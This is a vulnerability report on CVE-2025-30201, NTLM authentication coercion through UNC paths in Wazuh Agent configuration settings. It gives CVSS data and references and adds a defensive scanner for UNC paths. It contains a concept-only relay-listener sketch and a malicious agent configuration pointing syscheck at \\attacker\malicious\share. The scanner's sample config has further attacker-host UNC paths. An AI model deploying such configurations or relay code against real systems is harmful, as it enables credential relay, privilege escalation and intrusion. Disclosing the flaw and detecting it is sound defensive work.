Security Vulnerability Report
CVE-2025-30201 CVSS 7.7 HIGH

CVE-2025-30201

Published: 2025-11-21 19:15:50
Last Modified: 2025-12-02 16:45:54

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to version 4.13.0, a vulnerability in Wazuh Agent allows authenticated attackers to force NTLM authentication through malicious UNC paths in various agent configuration settings, potentially leading to NTLM relay attacks that could result in privilege escalation and remote code execution. This issue has been patched in version 4.13.0.

How the coercion works: when a Windows agent is handed a path of the form \\host\share in a configuration value, the SMB client connects to that host and authenticates with NTLM as the agent's own account. If the host is attacker-controlled, the attacker receives that authentication and can relay it to another service that accepts NTLM. Both CVSS vectors recorded for this CVE carry PR:H, so the attacker must already hold privileges sufficient to change agent configuration; the affected range is every version before 4.13.0.

CVSS Details

The score in the page header is the Secondary metric from the raw data; the raw data also carries a Primary metric that rates the issue higher (AC:L and A:H instead of AC:H and A:N). Both are listed.

CVSS Score (Secondary metric)
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N

CVSS Score (Primary metric)
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Weaknesses
CWE-73 (External Control of File Name or Path) and CWE-294 (Authentication Bypass by Capture-replay) from the Secondary source; NVD-CWE-noinfo from the Primary source.

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE
Wazuh Agent < 4.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-30201 NTLM relay PoC (concept only).
# Part 1: a minimal listener that accepts the SMB connection the coerced
# Wazuh agent makes to the attacker-controlled UNC host and forwards the
# first NTLM message to a relay target. A working relay has to proxy the
# whole NTLM handshake in both directions (what impacket's ntlmrelayx does);
# this sketch only shows the first hop.
import socket


def start_relay_server(target='target_server', listen_port=445):
    """Accept inbound SMB/NTLM connections and forward them to the relay target."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', listen_port))
    server.listen(5)
    print(f'[+] NTLM relay server listening on port {listen_port}')
    while True:
        conn, addr = server.accept()
        print(f'[*] Connection received from {addr}')
        # Capture the first NTLM message (negotiate) sent by the coerced agent
        ntlm_negotiate = conn.recv(1024)
        # Relay to the target (e.g. Wazuh server or DC)
        relay_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        relay_conn.connect((target, 445))
        # Forward NTLM messages
        relay_conn.sendall(ntlm_negotiate)
        # Execute commands with the relayed credentials
        # ... (full exploit requires Wazuh-specific knowledge)
        relay_conn.close()
        conn.close()


# Part 2: the trigger. A UNC path in an agent configuration setting makes the
# agent open \\attacker\... over SMB and authenticate with NTLM using its own
# account. Raw string so the backslashes survive unchanged.
malicious_config = r'''
<ossec_config>
  <syscheck>
    <directories check_all="yes">\\attacker\malicious\share</directories>
  </syscheck>
</ossec_config>
'''

if __name__ == '__main__':
    print('[+] Malicious config generated for Wazuh Agent injection')
    print(malicious_config)
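The defensive counterpart to the configuration above, added here as an example (this is not Wazuh's code and not part of the original report): a scanner that walks an agent configuration XML and flags every element text or attribute that is a UNC path, plus a helper that reports whether an agent version falls in the affected range (below 4.13.0, per the CPE match on this page). The settings in the constructed sample (syscheck directories, localfile location, a command wodle) are assumed examples of the "various agent configuration settings" the description refers to; the hostnames and paths are made up. The regex also accepts the forward-slash (//host/share) and long-form (\\?\UNC\host\share) spellings, which the Windows SMB client treats the same way.

```python
# Added example: scan a Wazuh agent configuration for UNC paths that would
# coerce the agent into NTLM authentication (CVE-2025-30201). Not Wazuh code.
import re
import xml.etree.ElementTree as ET

# Matches \\host\..., //host/... and the long-form \\?\UNC\host\... prefix.
UNC_RE = re.compile(
    r"^\s*(?:\\\\\?\\UNC\\|\\\\|//)[^\\/\s]+(?=[\\/]|\s*$)", re.IGNORECASE
)

# Constructed sample agent.conf (not from any real deployment). The settings
# used are assumed examples of configuration values that take a path.
SAMPLE_AGENT_CONF = r"""
<agent_conf>
  <syscheck>
    <directories check_all="yes">C:\Windows\System32,\\attacker\share\loot</directories>
    <ignore>C:\ProgramData\temp</ignore>
  </syscheck>
  <localfile>
    <location>\\?\UNC\attacker\logs\app.log</location>
    <log_format>syslog</log_format>
  </localfile>
  <wodle name="command">
    <command>//attacker/tools/run.bat</command>
  </wodle>
</agent_conf>
"""


def is_unc_path(value):
    """True if value is a UNC path, i.e. one the Windows SMB client would open."""
    return bool(UNC_RE.match(value or ""))


def _walk(elem, trail, hits):
    """Depth-first walk recording (location, value) for every UNC path found."""
    path = f"{trail}/{elem.tag}"
    # Some settings (for example <directories>) accept comma-separated lists.
    for piece in (elem.text or "").split(","):
        if is_unc_path(piece):
            hits.append((path, piece.strip()))
    for name, val in elem.attrib.items():
        if is_unc_path(val):
            hits.append((f"{path}@{name}", val.strip()))
    for child in elem:
        _walk(child, path, hits)


def find_unc_paths(xml_text):
    """Return (location, value) pairs for every UNC path in a config file.
    A config file may hold several top-level blocks, so it is wrapped in a
    synthetic root before parsing."""
    root = ET.fromstring(f"<root>{xml_text}</root>")
    hits = []
    for top in root:
        _walk(top, "", hits)
    return hits


def agent_version_affected(version):
    """True if a Wazuh agent version string is below the fixed release 4.13.0."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))
    return tuple(nums) < (4, 13, 0)


def audit(xml_text, version):
    """Run both checks; returns (version_affected, unc_hits)."""
    return agent_version_affected(version), find_unc_paths(xml_text)


if __name__ == "__main__":
    affected, hits = audit(SAMPLE_AGENT_CONF, "v4.12.0")
    print(f"agent version affected: {affected}")
    for location, value in hits:
        print(f"UNC path in {location}: {value}")
```

Run it against the agent.conf that the manager pushes to its groups and against each agent's local ossec.conf; any hit on a version below 4.13.0 is a coercion path that an attacker with configuration rights could use, and any hit at all is worth a look regardless of version, since a UNC path in agent configuration is rarely intended.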

References

https://github.com/wazuh/wazuh/security/advisories/GHSA-x697-jf34-gp5x (Vendor Advisory, Exploit)
https://github.com/wazuh/wazuh/commit/688972da589e5d40d2a81bcd738240303a3dc45a (Patch)
https://github.com/wazuh/wazuh/pull/30060 (Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30201", "sourceIdentifier": "[email protected]", "published": "2025-11-21T19:15:50.293", "lastModified": "2025-12-02T16:45:54.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to version 4.13.0, a vulnerability in Wazuh Agent allows authenticated attackers to force NTLM authentication through malicious UNC paths in various agent configuration settings, potentially leading NTLM relay attacks that would result privilege escalation and remote code execution. This issue has been patched in version 4.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-294"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": 
true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.13.0", "matchCriteriaId": "6248EA61-D178-48E6-B2E3-EA37BFEDC305"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/commit/688972da589e5d40d2a81bcd738240303a3dc45a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wazuh/wazuh/pull/30060", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-x697-jf34-gp5x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}